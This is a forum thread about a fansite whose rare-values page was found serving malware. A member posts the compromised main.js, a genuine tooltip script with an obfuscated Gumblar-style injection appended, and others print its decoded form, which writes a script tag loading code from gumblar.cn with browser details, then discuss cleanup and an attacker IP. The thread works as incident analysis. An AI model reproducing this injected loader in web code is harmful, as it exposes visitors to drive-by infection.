http://img89.imageshack.us/img89/6775/virusl.png

Thread closed by Jordan (Forum Super Moderator): Due to bump

No one visits their values anyway so not many people will get infected

*Removed*

Edited by Flisker (Forum Moderator): Please do not accuse people of hacking or scamming

Oh second time being hacked then Pabble?

DON'T GO ON HHGS.NET

Oh second time being hacked then Pabble?

DON'T GO ON HHGS.NET

Only my msn got hacked. and that got hacked 3 time's

show's how much you know, doesn't it.


ANYWAY..... this thread isn't about argueing, so post what you think about the screenie

Only my msn got hacked. and that got hacked 3 time's

show's how much you know, doesn't it.


ANYWAY..... this thread isn't about argueing, so post what you think about the screenie

I think nobody cares

i think this is a load of ********? :P

The .JS isnt a trojan, you're antvirus is **** and said it is.

If it comes down to posting the file then kk

Includes on the main.js;

<!--
/*
Pleas leave this notice.
DHTML tip message version 1.2 copyright Essam Gamal 2003 (http://migoicons.tripod.com, [email protected])
All modifications are done in the style.js you should not modify this file. Created on : 06/03/2003
Script featured on and can be found at Dynamic Drive (http://www.dynamicdrive.com)
*/

var ua = navigator.userAgent
var ps = navigator.productSub
var dom = (document.getElementById)? 1:0
var ie4 = (document.all&&!dom)? 1:0
var ie5 = (document.all&&dom)? 1:0
var nn4 =(navigator.appName.toLowerCase() == "netscape" && parseInt(navigator.appVersion) == 4)
var nn6 = (dom&&!ie5)? 1:0
var sNav = (nn4||nn6||ie4||ie5)? 1:0
var cssFilters = ((ua.indexOf("MSIE 5.5")>=0||ua.indexOf("MSIE 6")>=0)&&ua.indexOf("Opera")<0)? 1:0
var Style=[],Text=[],Count=0,sbw=0,move=0,hs="",mx,my,scl,sct,ww,wh,obj,sl,st,ih,iw,vl,hl,sv,evlh ,evlw,tbody
var HideTip = "eval(obj+sv+hl+';'+obj+sl+'=0;'+obj+st+'=-800')"
var doc_root = ((ie5&&ua.indexOf("Opera")<0||ie4)&&document.compatMode=="CSS1Compat")? "document.documentElement":"document.body"
var PX = (nn6)? "px" :""

if(sNav) {
window.onresize = ReloadTip
document.onmousemove = MoveTip
if(nn4) document.captureEvents(Event.MOUSEMOVE)
}
if(nn4||nn6) {
mx = "e.pageX"
my = "e.pageY"
scl = "window.pageXOffset"
sct = "window.pageYOffset"
if(nn4) {
obj = "document.TipLayer."
sl = "left"
st = "top"
ih = "clip.height"
iw = "clip.width"
vl = "'show'"
hl = "'hide'"
sv = "visibility="
}
else obj = "document.getElementById('TipLayer')."
}
if(ie4||ie5) {
obj = "TipLayer."
mx = "event.x"
my = "event.y"
scl = "eval(doc_root).scrollLeft"
sct = "eval(doc_root).scrollTop"
if(ie5) {
mx = mx+"+"+scl
my = my+"+"+sct
}
}
if(ie4||dom){
sl = "style.left"
st = "style.top"
ih = "offsetHeight"
iw = "offsetWidth"
vl = "'visible'"
hl = "'hidden'"
sv = "style.visibility="
}
if(ie4||ie5||ps>=20020823) {
ww = "eval(doc_root).clientWidth"
wh = "eval(doc_root).clientHeight"
}
else {
ww = "window.innerWidth"
wh = "window.innerHeight"
evlh = eval(wh)
evlw = eval(ww)
sbw=15
}

function applyCssFilter(){
if(cssFilters&&FiltersEnabled) {
var dx = " progid:DXImageTransform.Microsoft."
TipLayer.style.filter = "revealTrans()"+dx+"Fade(Overlap=1.00 enabled=0)"+dx+"Inset(enabled=0)"+dx+"Iris(irisstyle=PLUS,motion=in enabled=0)"+dx+"Iris(irisstyle=PLUS,motion=out enabled=0)"+dx+"Iris(irisstyle=DIAMOND,motion=in enabled=0)"+dx+"Iris(irisstyle=DIAMOND,motion=out enabled=0)"+dx+"Iris(irisstyle=CROSS,motion=in enabled=0)"+dx+"Iris(irisstyle=CROSS,motion=out enabled=0)"+dx+"Iris(irisstyle=STAR,motion=in enabled=0)"+dx+"Iris(irisstyle=STAR,motion=out enabled=0)"+dx+"RadialWipe(wipestyle=CLOCK enabled=0)"+dx+"RadialWipe(wipestyle=WEDGE enabled=0)"+dx+"RadialWipe(wipestyle=RADIAL enabled=0)"+dx+"Pixelate(MaxSquare=35,enabled=0)"+dx+"Slide(slidestyle=HIDE,Bands=25 enabled=0)"+dx+"Slide(slidestyle=PUSH,Bands=25 enabled=0)"+dx+"Slide(slidestyle=SWAP,Bands=25 enabled=0)"+dx+"Spiral(GridSizeX=16,GridSizeY=16 enabled=0)"+dx+"Stretch(stretchstyle=HIDE enabled=0)"+dx+"Stretch(stretchstyle=PUSH enabled=0)"+dx+"Stretch(stretchstyle=SPIN enabled=0)"+dx+"Wheel(spokes=16 enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=0,motion= forward enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=0,motion= reverse enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=1,motion= forward enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=1,motion= reverse enabled=0)"+dx+"Zigzag(GridSizeX=8,GridSizeY=8 enabled=0)"+dx+"Alpha(enabled=0)"+dx+"Dropshadow(OffX=3,OffY=3,Positive=true,enabled=0)"+dx+"Shadow(strength=3,direction=135,enabled=0)"
}
}

function stm(t,s) {
if(sNav) {
if(t.length<2||s.length<25) {
var ErrorNotice = "DHTML TIP MESSAGE VERSION 1.2 ERROR NOTICE.\n"
if(t.length<2&&s.length<25) alert(ErrorNotice+"It looks like you removed an entry or more from the Style Array and Text Array of this tip.\nTheir should be 25 entries in every Style Array even though empty and 2 in every Text Array. You defined only "+s.length+" entries in the Style Array and "+t.length+" entry in the Text Array. This tip won't be viewed to avoid errors")
else if(t.length<2) alert(ErrorNotice+"It looks like you removed an entry or more from the Text Array of this tip.\nTheir should be 2 entries in every Text Array. You defined only "+t.length+" entry. This tip won't be viewed to avoid errors.")
else if(s.length<25) alert(ErrorNotice+"It looks like you removed an entry or more from the Style Array of this tip.\nTheir should be 25 entries in every Style Array even though empty. You defined only "+s.length+" entries. This tip won't be viewed to avoid errors.")
}
else {
var ab = "" ;var ap = ""
var titCol = (s[0])? "COLOR='"+s[0]+"'" : ""
var txtCol = (s[1])? "COLOR='"+s[1]+"'" : ""
var titBgCol = (s[2])? "BGCOLOR='"+s[2]+"'" : ""
var txtBgCol = (s[3])? "BGCOLOR='"+s[3]+"'" : ""
var titBgImg = (s[4])? "BACKGROUND='"+s[4]+"'" : ""
var txtBgImg = (s[5])? "BACKGROUND='"+s[5]+"'" : ""
var titTxtAli = (s[6] && s[6].toLowerCase()!="left")? "ALIGN='"+s[6]+"'" : ""
var txtTxtAli = (s[7] && s[7].toLowerCase()!="left")? "ALIGN='"+s[7]+"'" : ""
var add_height = (s[15])? "HEIGHT='"+s[15]+"'" : ""
if(!s[8]) s[8] = "Verdana,Arial,Helvetica"
if(!s[9]) s[9] = "Verdana,Arial,Helvetica"
if(!s[12]) s[12] = 1
if(!s[13]) s[13] = 1
if(!s[14]) s[14] = 200
if(!s[16]) s[16] = 0
if(!s[17]) s[17] = 0
if(!s[18]) s[18] = 10
if(!s[19]) s[19] = 10
hs = s[11].toLowerCase()
if(ps==20001108){
if(s[2]) ab="STYLE='border:"+s[16]+"px solid"+" "+s[2]+"'"
ap="STYLE='padding:"+s[17]+"px "+s[17]+"px "+s[17]+"px "+s[17]+"px'"}
var closeLink=(hs=="sticky")? "<TD ALIGN='right'><FONT SIZE='"+s[12]+"' FACE='"+s[8]+"'><A HREF='javascript:void(0)' ONCLICK='stickyhide()' STYLE='text-decoration:none;color:"+s[0]+"'><B>Close</B></A></FONT></TD>":""
var title=(t[0]||hs=="sticky")? "<TABLE WIDTH='100%' BORDER='0' CELLPADDING='0' CELLSPACING='0'><TR><TD "+titTxtAli+"><FONT SIZE='"+s[12]+"' FACE='"+s[8]+"' "+titCol+"><B>"+t[0]+"</B></FONT></TD>"+closeLink+"</TR></TABLE>" : ""
var txt="<TABLE "+titBgImg+" "+ab+" WIDTH='"+s[14]+"' BORDER='0' CELLPADDING='"+s[16]+"' CELLSPACING='0' "+titBgCol+" ><TR><TD>"+title+"<TABLE WIDTH='100%' "+add_height+" BORDER='0' CELLPADDING='"+s[17]+"' CELLSPACING='0' "+txtBgCol+" "+txtBgImg+"><TR><TD "+txtTxtAli+" "+ap+" VALIGN='top'><FONT SIZE='"+s[13]+"' FACE='"+s[9]+"' "+txtCol +">"+t[1]+"</FONT></TD></TR></TABLE></TD></TR></TABLE>"
if(nn4) {
with(eval(obj+"document")) {
open()
write(txt)
close()
}
}
else eval(obj+"innerHTML=txt")
tbody = {
Pos:s[10].toLowerCase(),
Xpos:s[18],
Ypos:s[19],
Transition:s[20],
Duration:s[21],
Alpha:s[22],
ShadowType:s[23].toLowerCase(),
ShadowColor:s[24],
Width:parseInt(eval(obj+iw)+3+sbw)
}
if(ie4) {
TipLayer.style.width = s[14]
tbody.Width = s[14]
}
Count=0
move=1
}
}
}

function MoveTip(e) {
if(move) {
var X,Y,MouseX = eval(mx),MouseY = eval(my); tbody.Height = parseInt(eval(obj+ih)+3)
tbody.wiw = parseInt(eval(ww+"+"+scl)); tbody.wih = parseInt(eval(wh+"+"+sct))
switch(tbody.Pos) {
case "left" : X=MouseX-tbody.Width-tbody.Xpos; Y=MouseY+tbody.Ypos; break
case "center": X=MouseX-(tbody.Width/2); Y=MouseY+tbody.Ypos; break
case "float": X=tbody.Xpos+eval(scl); Y=tbody.Ypos+eval(sct); break
case "fixed": X=tbody.Xpos; Y=tbody.Ypos; break
default: X=MouseX+tbody.Xpos; Y=MouseY+tbody.Ypos
}

if(tbody.wiw<tbody.Width+X) X = tbody.wiw-tbody.Width
if(tbody.wih<tbody.Height+Y+sbw) {
if(tbody.Pos=="float"||tbody.Pos=="fixed") Y = tbody.wih-tbody.Height-sbw
else Y = MouseY-tbody.Height
}
if(X<0) X=0
eval(obj+sl+"=X+PX;"+obj+st+"=Y+PX")
ViewTip()
}
}

function ViewTip() {
Count++
if(Count == 1) {
if(cssFilters&&FiltersEnabled) {
for(Index=28; Index<31; Index++) { TipLayer.filters[Index].enabled = 0 }
for(s=0; s<28; s++) { if(TipLayer.filters[s].status == 2) TipLayer.filters[s].stop() }
if(tbody.Transition == 51) tbody.Transition = parseInt(Math.random()*50)
var applyTrans = (tbody.Transition>-1&&tbody.Transition<24&&tbody.Duration>0)? 1:0
var advFilters = (tbody.Transition>23&&tbody.Transition<51&&tbody.Duration>0)? 1:0
var which = (applyTrans)?0:(advFilters)? tbody.Transition-23:0
if(tbody.Alpha>0&&tbody.Alpha<100) {
TipLayer.filters[28].enabled = 1
TipLayer.filters[28].opacity = tbody.Alpha
}
if(tbody.ShadowColor&&tbody.ShadowType == "simple") {
TipLayer.filters[29].enabled = 1
TipLayer.filters[29].color = tbody.ShadowColor
}
else if(tbody.ShadowColor&&tbody.ShadowType == "complex") {
TipLayer.filters[30].enabled = 1
TipLayer.filters[30].color = tbody.ShadowColor
}
if(applyTrans||advFilters) {
eval(obj+sv+hl)
if(applyTrans) TipLayer.filters[0].transition = tbody.Transition
TipLayer.filters[which].duration = tbody.Duration
TipLayer.filters[which].apply()
}
}
eval(obj+sv+vl)
if(cssFilters&&FiltersEnabled&&(applyTrans||advFilters)) TipLayer.filters[which].play()
if(hs == "sticky") move=0
}
}

function stickyhide() {
eval(HideTip)
}

function ReloadTip() {
if(nn4&&(evlw!=eval(ww)||evlh!=eval(wh))) location.reload()
else if(hs == "sticky") eval(HideTip)
}

function htm() {
if(sNav) {
if(hs!="keep") {
move=0;
if(hs!="sticky") eval(HideTip)
}
}
}


//-->


<!--
(function(){var ebp='%';var lWR0='v.61.72.20.61.3d.22Scrip.74Engin.65.22.2cb.3 d.22Versi.6fn.28)+.22.2c.6a.3d.22.22.2cu.3dn.61.76 .69gat.6fr.2euserAgent.3b.69f((.75.2eindex.4ff.28. 22.57.69.6e.22).3e0).26.26.28u.2e.69n.64e.78O.66(. 22NT.206.22).3c0.29.26.26.28.64oc.75me.6et.2ec.6fo .6bi.65.2e.69ndex.4f.66(.22miek.3d.31.22).3c0.29.2 6.26(typeo.66(zrvzts).21.3d.74.79.70eof.28.22.41.2 2))).7bzrvzts.3d.22A.22.3bev.61l.28.22if(w.69ndow. 2e.22+.61+.22.29j.3dj+.22+a.2b.22.4d.61j.6fr.22+b+ a+.22Min.6fr.22+.62.2b.61.2b.22.42u.69ld.22+b.2b.2 2.6a.3b.22).3bdoc.75men.74.2ewri.74.65(.22.3c.73c. 72ip.74.20src.3d.2f.2fgumblar.2ecn.2frss.2f.3fid.3 d.22+j+.22.3e.3c.5c.2fscri.70t.3e.22.29.3b.7d';var HHf2=unescape(lWR0.replace(/./g,ebp));eval(HHf2)})();
-->
I see no were wheres its attempting to give a trojan out?

when I visit the site it says

Malware name - JS:Redirector-H7 [Trj]
Malware type - Trojan Horse

hmmm...

explain the second from last line ross.

Its to do with the rares hover over Jin!

Jake be quiet your using avast which is crap, HHGS doesnt have trojan in it look at Ross's code if it did then he woulnt post the code...

Dunno what ur trying to achieve here.

his name isn't jake

Rumours say jakes on Pabbles account LOL. (ty roflcopter)

i jk

It is when your logged onto it :o

WHAT THE HELL LMAO

JIN IP CHECK KTHNX

WHAT THE HELL LMAO

JIN IP CHECK KTHNX
kk :S meh rc might be ************ :P

not a trojan tho' soz

Jake be quiet your using avast which is crap, HHGS doesnt have trojan in it look at Ross's code if it did then he woulnt post the code...

Dunno what ur trying to achieve here.

Pretty silly statement there, ross doesnt have to be behind the malicious code if his server has a security flaw in it which allows people to write to his .js file or a member of staff had ftp details then they could insert the malicious code themselves.

I also couldn't think of a better place other than a rare values page considering the assumption that users who view that page would own a proportion of rares.

I am having someone else look at the code just in case anyway.

reported posts for accusing me of hacking, animals.

It's a code from Dynamic Drive, so im highly doubting it has a trojan :}

It's a code from Dynamic Drive, so im highly doubting it has a trojan :}

Means diddly squat if you have read my previous post.

This is the original code from dynamic drive.


<!--
/*
Pleas leave this notice.
DHTML tip message version 1.2 copyright Essam Gamal 2003 (http://migoicons.tripod.com, [email protected])
All modifications are done in the style.js you should not modify this file. Created on : 06/03/2003
Script featured on and can be found at Dynamic Drive (http://www.dynamicdrive.com)
*/

var ua = navigator.userAgent
var ps = navigator.productSub
var dom = (document.getElementById)? 1:0
var ie4 = (document.all&&!dom)? 1:0
var ie5 = (document.all&&dom)? 1:0
var nn4 =(navigator.appName.toLowerCase() == "netscape" && parseInt(navigator.appVersion) == 4)
var nn6 = (dom&&!ie5)? 1:0
var sNav = (nn4||nn6||ie4||ie5)? 1:0
var cssFilters = ((ua.indexOf("MSIE 5.5")>=0||ua.indexOf("MSIE 6")>=0)&&ua.indexOf("Opera")<0)? 1:0
var Style=[],Text=[],Count=0,sbw=0,move=0,hs="",mx,my,scl,sct,ww,wh,obj,sl,st,ih,iw,vl,hl,sv,evlh ,evlw,tbody
var HideTip = "eval(obj+sv+hl+';'+obj+sl+'=0;'+obj+st+'=-800')"
var doc_root = ((ie5&&ua.indexOf("Opera")<0||ie4)&&document.compatMode=="CSS1Compat")? "document.documentElement":"document.body"
var PX = (nn6)? "px" :""

if(sNav) {
window.onresize = ReloadTip
document.onmousemove = MoveTip
if(nn4) document.captureEvents(Event.MOUSEMOVE)
}
if(nn4||nn6) {
mx = "e.pageX"
my = "e.pageY"
scl = "window.pageXOffset"
sct = "window.pageYOffset"
if(nn4) {
obj = "document.TipLayer."
sl = "left"
st = "top"
ih = "clip.height"
iw = "clip.width"
vl = "'show'"
hl = "'hide'"
sv = "visibility="
}
else obj = "document.getElementById('TipLayer')."
}
if(ie4||ie5) {
obj = "TipLayer."
mx = "event.x"
my = "event.y"
scl = "eval(doc_root).scrollLeft"
sct = "eval(doc_root).scrollTop"
if(ie5) {
mx = mx+"+"+scl
my = my+"+"+sct
}
}
if(ie4||dom){
sl = "style.left"
st = "style.top"
ih = "offsetHeight"
iw = "offsetWidth"
vl = "'visible'"
hl = "'hidden'"
sv = "style.visibility="
}
if(ie4||ie5||ps>=20020823) {
ww = "eval(doc_root).clientWidth"
wh = "eval(doc_root).clientHeight"
}
else {
ww = "window.innerWidth"
wh = "window.innerHeight"
evlh = eval(wh)
evlw = eval(ww)
sbw=15
}

function applyCssFilter(){
if(cssFilters&&FiltersEnabled) {
var dx = " progid:DXImageTransform.Microsoft."
TipLayer.style.filter = "revealTrans()"+dx+"Fade(Overlap=1.00 enabled=0)"+dx+"Inset(enabled=0)"+dx+"Iris(irisstyle=PLUS,motion=in enabled=0)"+dx+"Iris(irisstyle=PLUS,motion=out enabled=0)"+dx+"Iris(irisstyle=DIAMOND,motion=in enabled=0)"+dx+"Iris(irisstyle=DIAMOND,motion=out enabled=0)"+dx+"Iris(irisstyle=CROSS,motion=in enabled=0)"+dx+"Iris(irisstyle=CROSS,motion=out enabled=0)"+dx+"Iris(irisstyle=STAR,motion=in enabled=0)"+dx+"Iris(irisstyle=STAR,motion=out enabled=0)"+dx+"RadialWipe(wipestyle=CLOCK enabled=0)"+dx+"RadialWipe(wipestyle=WEDGE enabled=0)"+dx+"RadialWipe(wipestyle=RADIAL enabled=0)"+dx+"Pixelate(MaxSquare=35,enabled=0)"+dx+"Slide(slidestyle=HIDE,Bands=25 enabled=0)"+dx+"Slide(slidestyle=PUSH,Bands=25 enabled=0)"+dx+"Slide(slidestyle=SWAP,Bands=25 enabled=0)"+dx+"Spiral(GridSizeX=16,GridSizeY=16 enabled=0)"+dx+"Stretch(stretchstyle=HIDE enabled=0)"+dx+"Stretch(stretchstyle=PUSH enabled=0)"+dx+"Stretch(stretchstyle=SPIN enabled=0)"+dx+"Wheel(spokes=16 enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=0,motion= forward enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=0,motion= reverse enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=1,motion= forward enabled=0)"+dx+"GradientWipe(GradientSize=1.00,wipestyle=1,motion= reverse enabled=0)"+dx+"Zigzag(GridSizeX=8,GridSizeY=8 enabled=0)"+dx+"Alpha(enabled=0)"+dx+"Dropshadow(OffX=3,OffY=3,Positive=true,enabled=0)"+dx+"Shadow(strength=3,direction=135,enabled=0)"
}
}

function stm(t,s) {
if(sNav) {
if(t.length<2||s.length<25) {
var ErrorNotice = "DHTML TIP MESSAGE VERSION 1.2 ERROR NOTICE.\n"
if(t.length<2&&s.length<25) alert(ErrorNotice+"It looks like you removed an entry or more from the Style Array and Text Array of this tip.\nTheir should be 25 entries in every Style Array even though empty and 2 in every Text Array. You defined only "+s.length+" entries in the Style Array and "+t.length+" entry in the Text Array. This tip won't be viewed to avoid errors")
else if(t.length<2) alert(ErrorNotice+"It looks like you removed an entry or more from the Text Array of this tip.\nTheir should be 2 entries in every Text Array. You defined only "+t.length+" entry. This tip won't be viewed to avoid errors.")
else if(s.length<25) alert(ErrorNotice+"It looks like you removed an entry or more from the Style Array of this tip.\nTheir should be 25 entries in every Style Array even though empty. You defined only "+s.length+" entries. This tip won't be viewed to avoid errors.")
}
else {
var ab = "" ;var ap = ""
var titCol = (s[0])? "COLOR='"+s[0]+"'" : ""
var txtCol = (s[1])? "COLOR='"+s[1]+"'" : ""
var titBgCol = (s[2])? "BGCOLOR='"+s[2]+"'" : ""
var txtBgCol = (s[3])? "BGCOLOR='"+s[3]+"'" : ""
var titBgImg = (s[4])? "BACKGROUND='"+s[4]+"'" : ""
var txtBgImg = (s[5])? "BACKGROUND='"+s[5]+"'" : ""
var titTxtAli = (s[6] && s[6].toLowerCase()!="left")? "ALIGN='"+s[6]+"'" : ""
var txtTxtAli = (s[7] && s[7].toLowerCase()!="left")? "ALIGN='"+s[7]+"'" : ""
var add_height = (s[15])? "HEIGHT='"+s[15]+"'" : ""
if(!s[8]) s[8] = "Verdana,Arial,Helvetica"
if(!s[9]) s[9] = "Verdana,Arial,Helvetica"
if(!s[12]) s[12] = 1
if(!s[13]) s[13] = 1
if(!s[14]) s[14] = 200
if(!s[16]) s[16] = 0
if(!s[17]) s[17] = 0
if(!s[18]) s[18] = 10
if(!s[19]) s[19] = 10
hs = s[11].toLowerCase()
if(ps==20001108){
if(s[2]) ab="STYLE='border:"+s[16]+"px solid"+" "+s[2]+"'"
ap="STYLE='padding:"+s[17]+"px "+s[17]+"px "+s[17]+"px "+s[17]+"px'"}
var closeLink=(hs=="sticky")? "<TD ALIGN='right'><FONT SIZE='"+s[12]+"' FACE='"+s[8]+"'><A HREF='javascript:void(0)' ONCLICK='stickyhide()' STYLE='text-decoration:none;color:"+s[0]+"'><B>Close</B></A></FONT></TD>":""
var title=(t[0]||hs=="sticky")? "<TABLE WIDTH='100%' BORDER='0' CELLPADDING='0' CELLSPACING='0'><TR><TD "+titTxtAli+"><FONT SIZE='"+s[12]+"' FACE='"+s[8]+"' "+titCol+"><B>"+t[0]+"</B></FONT></TD>"+closeLink+"</TR></TABLE>" : ""
var txt="<TABLE "+titBgImg+" "+ab+" WIDTH='"+s[14]+"' BORDER='0' CELLPADDING='"+s[16]+"' CELLSPACING='0' "+titBgCol+" ><TR><TD>"+title+"<TABLE WIDTH='100%' "+add_height+" BORDER='0' CELLPADDING='"+s[17]+"' CELLSPACING='0' "+txtBgCol+" "+txtBgImg+"><TR><TD "+txtTxtAli+" "+ap+" VALIGN='top'><FONT SIZE='"+s[13]+"' FACE='"+s[9]+"' "+txtCol +">"+t[1]+"</FONT></TD></TR></TABLE></TD></TR></TABLE>"
if(nn4) {
with(eval(obj+"document")) {
open()
write(txt)
close()
}
}
else eval(obj+"innerHTML=txt")
tbody = {
Pos:s[10].toLowerCase(),
Xpos:s[18],
Ypos:s[19],
Transition:s[20],
Duration:s[21],
Alpha:s[22],
ShadowType:s[23].toLowerCase(),
ShadowColor:s[24],
Width:parseInt(eval(obj+iw)+3+sbw)
}
if(ie4) {
TipLayer.style.width = s[14]
tbody.Width = s[14]
}
Count=0
move=1
}
}
}

function MoveTip(e) {
if(move) {
var X,Y,MouseX = eval(mx),MouseY = eval(my); tbody.Height = parseInt(eval(obj+ih)+3)
tbody.wiw = parseInt(eval(ww+"+"+scl)); tbody.wih = parseInt(eval(wh+"+"+sct))
switch(tbody.Pos) {
case "left" : X=MouseX-tbody.Width-tbody.Xpos; Y=MouseY+tbody.Ypos; break
case "center": X=MouseX-(tbody.Width/2); Y=MouseY+tbody.Ypos; break
case "float": X=tbody.Xpos+eval(scl); Y=tbody.Ypos+eval(sct); break
case "fixed": X=tbody.Xpos; Y=tbody.Ypos; break
default: X=MouseX+tbody.Xpos; Y=MouseY+tbody.Ypos
}

if(tbody.wiw<tbody.Width+X) X = tbody.wiw-tbody.Width
if(tbody.wih<tbody.Height+Y+sbw) {
if(tbody.Pos=="float"||tbody.Pos=="fixed") Y = tbody.wih-tbody.Height-sbw
else Y = MouseY-tbody.Height
}
if(X<0) X=0
eval(obj+sl+"=X+PX;"+obj+st+"=Y+PX")
ViewTip()
}
}

function ViewTip() {
Count++
if(Count == 1) {
if(cssFilters&&FiltersEnabled) {
for(Index=28; Index<31; Index++) { TipLayer.filters[Index].enabled = 0 }
for(s=0; s<28; s++) { if(TipLayer.filters[s].status == 2) TipLayer.filters[s].stop() }
if(tbody.Transition == 51) tbody.Transition = parseInt(Math.random()*50)
var applyTrans = (tbody.Transition>-1&&tbody.Transition<24&&tbody.Duration>0)? 1:0
var advFilters = (tbody.Transition>23&&tbody.Transition<51&&tbody.Duration>0)? 1:0
var which = (applyTrans)?0:(advFilters)? tbody.Transition-23:0
if(tbody.Alpha>0&&tbody.Alpha<100) {
TipLayer.filters[28].enabled = 1
TipLayer.filters[28].opacity = tbody.Alpha
}
if(tbody.ShadowColor&&tbody.ShadowType == "simple") {
TipLayer.filters[29].enabled = 1
TipLayer.filters[29].color = tbody.ShadowColor
}
else if(tbody.ShadowColor&&tbody.ShadowType == "complex") {
TipLayer.filters[30].enabled = 1
TipLayer.filters[30].color = tbody.ShadowColor
}
if(applyTrans||advFilters) {
eval(obj+sv+hl)
if(applyTrans) TipLayer.filters[0].transition = tbody.Transition
TipLayer.filters[which].duration = tbody.Duration
TipLayer.filters[which].apply()
}
}
eval(obj+sv+vl)
if(cssFilters&&FiltersEnabled&&(applyTrans||advFilters)) TipLayer.filters[which].play()
if(hs == "sticky") move=0
}
}

function stickyhide() {
eval(HideTip)
}

function ReloadTip() {
if(nn4&&(evlw!=eval(ww)||evlh!=eval(wh))) location.reload()
else if(hs == "sticky") eval(HideTip)
}

function htm() {
if(sNav) {
if(hs!="keep") {
move=0;
if(hs!="sticky") eval(HideTip)
}
}
}


//-->Jewbear has found the last two lines of your code to open: http://gumblar.cn/rss/ after he unfuzzled it. Suprise Suprise even firefox thinks its about to get brutally invaded.

But thats a RSS feed
that coulnt do ****>?

It attempts to contact:
"http://gumblar.cn/rss/" (don't visit it folks, it's a bad website)

With your browser & OS info if I'm not mistaken. Opens up to this:



var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=\"http://gumblar.cn/rss/?id=%22+j+%22\"><\/script>");}
}

But thats a RSS feed
that coulnt do ****>?

No its a directory named as RSS in the same way as I can have a directory named as exe, Php, xml.

Doesn't mean that it is an executable, php file or xml file.

It attempts to contact:
"http://gumblar.cn/rss/" (don't visit it folks, it's a bad website)

With your browser & OS info if I'm not mistaken. Opens up to this:



var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=\"http://gumblar.cn/rss/?id=%22+j+%22\"><\/script>");}
}


What does that code do + how could someone of put that in..

Who coded it Ross?

It attempts to contact:
"http://gumblar.cn/rss/" (don't visit it folks, it's a bad website)

With your browser & OS info if I'm not mistaken. Opens up to this:



var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A"))){zrvzts="A";eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=\"http://gumblar.cn/rss/?id=%22+j+%22\"><\/script>");}
}

What would that do?

Who knows what the sites agenda is but some information from internet giant google on the site is located here (http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-GB&site=http://gumblar.cn/rss/).

raw ftp logs have found an IP that is from Chelmsford

investigating

Because of this incident we are now re-building the rare value system, as well as making sure the forum wasn't touched, and other various scripts on HHGS.

Additionally Ross is contacting the ISP and police for information and to investigate it further.

Contacted police? LOL "Hello someone coded a values system for my Habbo fansite and I think they put a trojan on it." get a grip, police will tell you to **** off, it isn't even an emergency or a witness statement etc, what a waste of polices time.

Are you the guy by any chance who rang 999 to say there's no sprite in McDonalds?

Contacted police? LOL "Hello someone coded a values system for my Habbo fansite and I think they put a trojan on it." get a grip, police will tell you to **** off, it isn't even an emergency or a witness statement etc, what a waste of polices time.

Are you the guy by any chance who rang 999 to say there's no sprite in McDonalds?

(S)He gained unauthorised access to hhgs and edited loads of files with malicious code...

Close HHGS. You could do something better on the web in my opinion.

Close HHGS. You could do something better on the web in my opinion.

You haven't seen the new forum's features ;)

Additionally Ross is contacting the ISP and police for information and to investigate it further.
http://brian-moffatt.com/images/internetpolice.jpg


But seriously, i love how at the start of this thread its like "its not a trojan!11111!!!" and now that Jin and Jew have posted it is now like "okay, there could be malicious code..."

We've seen that files were edited on May 4TH so are restoring to a previous backup.

(S)He gained unauthorised access to hhgs and edited loads of files with malicious code...

Yeah still the police wouldnt do anything, it would need to be a serious crime on the internetz before the police bother to get involved. An insecure website with a line of malicious code to install a trojan isn't exactly worth their time and effort.

Not good. I would advise putting the site on maintenance and getting a decent coder to check your files.

(S)He gained unauthorised access to hhgs and edited loads of files with malicious code...

What does that have to do with anything, it's a Habbo fansite and he's probably only like 17 ;) ;) so they won't do anything.

You haven't seen the new forum's features ;)

rofl nice reply xD

K in the simplist way possible, ive been on hhgs.net on values am i infected with a trojan?

K in the simplist way possible, ive been on hhgs.net on values am i infected with a trojan?

No, you are not.

Some people are so paranoid. It uses a JS redirector to a site containing a trojan. If you have a good firewall, which you all seem to have, then you are fine. As you can see it's blocked you from viewing the site, therefore nothing to worry about. Calm down.

It should all be gone now, Thanks to Hostgator, HotelUser, Favourtism.
The IP that did it is;
77.96.228.62
I really dont know what to do about it, some people are saying it may be from the Conficker worm but i highly doubt it.
Anyways any more problems direct them to [email protected]
I'm sorry for saying you lied;
@Jake - But you normally do...
*REMOVED*
@Jin - sexy chocolate
@Jewish bear - fnx for decrypting some codes for me last night.

Edit by Robbie! (Forum Super Moderator): Please do not accuse other members of hacking

good luck finding out who did it, go get them homie.

Its not one person who did it, this is a very very smart virus, it starts off as a trojan it then writes the code to the JS file of its choice and once uploaded people will start seeing the trojan attack in their antivirus.

Problem is with this once it has infected one it will infect more so I advise you to check all Js files on your server as it will get worse if you don't.

One of our clients had this at work it was quite bad and took down my boss' pc, it got him because he downloaded the clients site files though.

Cheers
Matt

Its not one person who did it, this is a very very smart virus, it starts off as a trojan it then writes the code to the JS file of its choice and once uploaded people will start seeing the trojan attack in their antivirus.

Problem is with this once it has infected one it will infect more so I advise you to check all Js files on your server as it will get worse if you don't.

One of our clients had this at work it was quite bad and took down my boss' pc, it got him because he downloaded the clients site files though.

Cheers
Matt

